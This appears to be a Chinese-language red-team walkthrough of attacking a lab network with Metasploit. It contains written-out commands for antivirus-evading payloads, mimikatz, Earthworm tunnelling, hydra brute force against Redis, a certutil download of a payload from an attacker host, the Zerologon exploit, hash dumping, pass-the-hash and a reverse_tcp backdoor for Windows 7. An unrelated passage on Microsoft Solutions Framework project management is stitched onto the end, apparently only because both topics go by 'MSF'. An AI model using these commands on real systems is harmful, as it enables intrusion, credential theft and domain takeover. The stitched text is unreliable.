安全攻防实战系列MSF

前言

在红队攻防中，我们主要在外网进行信息收集，通过cms或者其他漏洞拿到shell，之后通过免杀木马将windows或linux服务器上线到cobalt strike或msf等c2服务器，之后对内网进行信息收集并绘制网络拓扑图，进行工作组或域渗透，拿到各个网段机器的权限，远程登陆并截图证明。

环境配置

从虚拟机网络来看

机器描述

目录如下

蚁剑拿shell

msf免杀拿shell

使用msfvenom生成免杀木马payload，里面的IP和端口自行修改，就是反弹shell的kali

使用分离免杀工具生成loader.exe文件

对生成的exe文件进行加壳免杀

免杀效果如下

免杀之后通过蚁剑上传到server-bt上

msf开启监听

蚁剑运行

getuid

ps

msf内网渗透

load mimikatz # 加载Mimikatz模块

成功开启了远程桌面，并且生成了一个txt文件，这个txt文件往后可用来关闭远程桌面，关闭命令

run multi_console_command -r /root/.msf4/loot/xx_default_192.168.1.5_host.windows.cle_xxx5.txt

绕过火绒添加用户

蚂蚁剑或者cs上传添加用户.exe

远程登录server-bt

然后再添加一个由system权限下开启的桌面进程

Earthworm穿透

上传EW（Earthworm）到C:/wwwroot/

kali环境进行爆破

proxychains hydra -P /usr/xxx/password.lst 192.168.59.4 redis 6379

利用过程

代理蚁剑进行连接这个shell

并查看权限

Earthworm穿透

挂代理，通过之前上传的EW（Earthworm）

服务器端执行以下命令(关掉server-bt的防火墙代理才能生效)

execute C:\wwwroot\ew.exe -s ssocksd -l 1090

用msfvenom生成一个正向马传进去（因为无法访问外网，反向出不来），msf正向连接。

使用分离免杀工具生成loader.exe文件

免杀效果如下

C:\ProgramData\xxxx.exe -i -c "certutil -urlcache -split -f http://192.168.59.133/msf1.exe msf1.exe

成功获取服务器的shell，之后就是各种权限维持了。创建计划任务、开机自启等等都能够实现。

ps

添加账户和远程连接同第一层

load mimikatz # 加载Mimikatz模块

这里已经满足触发zerologon的两个条件，能ping通域控制器，知道域控计算机名，当然最后dump出域内所有hash的时候需要域名

置空域控机器用户NTLM hash

proxychains python3 cve-2020-1472-exploit.py 12server-dc$ 10.10.10.201

接下来用置空的机器账户dump所有hash

(890c这个hash就是"空"的NTML hash）

我们的目标是获得域内administrator的hash，然后就可以hash传递，登陆任意域内机器

利用 psexec(PTH)上线server-dc到 MSF：

成功获取到shell

利用 psexec 上线server-ex13到 MSF：

很多朋友对使用Metasploit利用后门程序进行渗透windows7都比较感兴趣，针对这些以下业内相关专家就给大家介绍下，当下黑客怎么利用Metasploit进行渗透windows7的。

设定目标主机为：cn_win7_x86_7601虚拟机，地址为：192.168.0.116；而本地主机就为：192.168.0.149。

方法步骤一：黑客用Msfpayload直接生成相关的后门程序，如下图。

sfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.149 x >steup.exe

方法步骤二：黑客直接就能进入所在的目录并将属性进行修改，换为允许以程序执行文件，详细如下图。

进入所在目录，修改属性：选择“允许以程序执行文件”,这时候也可以做一些免杀

方法步骤三：接着黑客就打开msfconsole并加载exploit/multi/handler模块并进行设置本地主机，最后就能开始进行监听了，详细情况如下图。

打开msfconsole，加载exploit/multi/handler模块，设置本地主机；然后开始监听：exploit -z -j ：

方法步骤四：黑客需要能将程序直接拷贝都目标主机中并进行执行。

·程序管理员。他负责制定计划,每天找出完成该计划的风险所在,排除风险,每天交付应该完成的内容,确保计划按质、按量实施。 ·用户教育。设计友好的用户界面,对用户进行培训,确保用户能够并且愿意和喜欢使用开发出的产品。 ·开发。开发者在开发前期就参与用户需求分析和项目计划制定,他最清楚具体的开发过程。在开发期开始后,他负责进行代码开发,在每一个阶段,交付每一项内容的代码。 ·测试。负责开发出的代码的测试。测试者并不是要找到每一个开发者的每一段代码的每一个错误(bug),而是要找到代码错误之间的关系,解决最根本的错误,掌握错误的状态,从而迅速排除错误。 ·后勤。后勤人员负责将实验室的产品商品化,变成实际可以运行的产品,达到最初制定的商业目的,取得商业效益。这项工作在以往的项目中可能比较简单,因为实验室的环境可能和实际环境几乎一致或差别不大。而现在却不同了,实验室环境可能十分简单,而实际环境可能非常复杂,比如分布式环境、Internet/Intranet环境等,尤其是大企业,实际环境比实验室环境复杂得多,因而将实验室产品运用到实际环境中是一项非常重要的工作。这项工作没有完成好,往往使整个项目前功尽弃,功亏一篑。 二、MSF简史 1994年，基于微软产品开发的经验和教训以及微软微软咨询服务的业务经验，微软推出了Microsoft? 解决方案框架 Microsoft Solution Framework (MSF)。当时的MSF只是这些经验教训的松散集合。在以后的几年中，MSF 进一步吸收了微软各个部门和微软的合作伙伴在实际项目中的经验，在2002年，随着Visual Studio.Net 的发布，微软发布了一系列关于MSF 3.0的白皮书，针对MSF 3.0 的大规模培训也在中国开始。 2006年，MSF 4.0 随着Visual Studio Team Foundation 2005 发布。它增加了不少敏捷开发的内容，并且明确刻画了团队典型的流程和在新的团队协作软件包VSTS 中的应用。 我们可以不用管MSF 演化的细节，要记住所有模式都不是一成不变的，关键是要掌握变化的原因。 三、MSF的基本原则 MSF的核心有八个基本原则： ·推动开放的沟通 ·为共同的前景而工作 ·充分授权和信任 ·各司其职，对项目共同负责 ·重视商业价值 ·保持敏捷，预期变化 ·质量投资 ·学习所有的经验 四、MSF的一些特点 MSF是微软在总结自身多年项目管理经验的基础上提出的一套项目管理界方案，主要特点是实用性和可操作性强，有许多方面值得我们借鉴。现对其要点作一描述。需要注意的是，微软有国内企业不能比拟的优势：如人力资源优势等，所以并不一定完全适合国内的软件行业，但我们可以发现，他们的很多做法是我们已经意识到并有所改进，有些做法我们可能已经体会到但还没有有上升到一个管理原则的高度。 1、Code Review 原则 是指程序员定期向其他人讲解自己源程序的活动，这个方法被众多公司采用并被认为是一个行之有效的方法。主要优点有： 因为要向大家讲解自己的程序，程序员会更重视自己的工作进度、代码质量。 可以互相学习，共同提高，及时发现问题。 程序员可掌握他人的程序设计思想和方法，利于维护他人程序 2、版本管理方法，采用统一的版本管理服务器管理项目源程序，每个人的程序，必须经另外一个程序员检查后才能Check in， 每天晚上都有build所有程序，如果build不能通过，程序员必须立即修改自己的程序。每隔一段时间配合进度里程碑release一个内部版本。主要优点： 从开始程序就是一个整体，而不是到最后才整合在一起。 互相检查才能Check in可以减少错误的发生。 里程碑的设定，对大项目的管理尤其有益，既不会因为计划时间较长而有松懈，也能做到有张有弛。 3、文档管理，MSF的文档崇尚实用简洁，尽量避免事后没人看得文档，资料的积累和经验的继承通过加强程序员的交流来解决（如Code Review, Check in 前的互相检查）。微软认为，一个项目的存在是和项目组的存在相关联的，如果项目组整个离开了团队，那么有再多的文档也没用。在不同的开发阶段，微软也有不同的文档要求，但应该注意到，微软开大的是办事系统软件，和一般的应用软件开发相比会有所不同。

---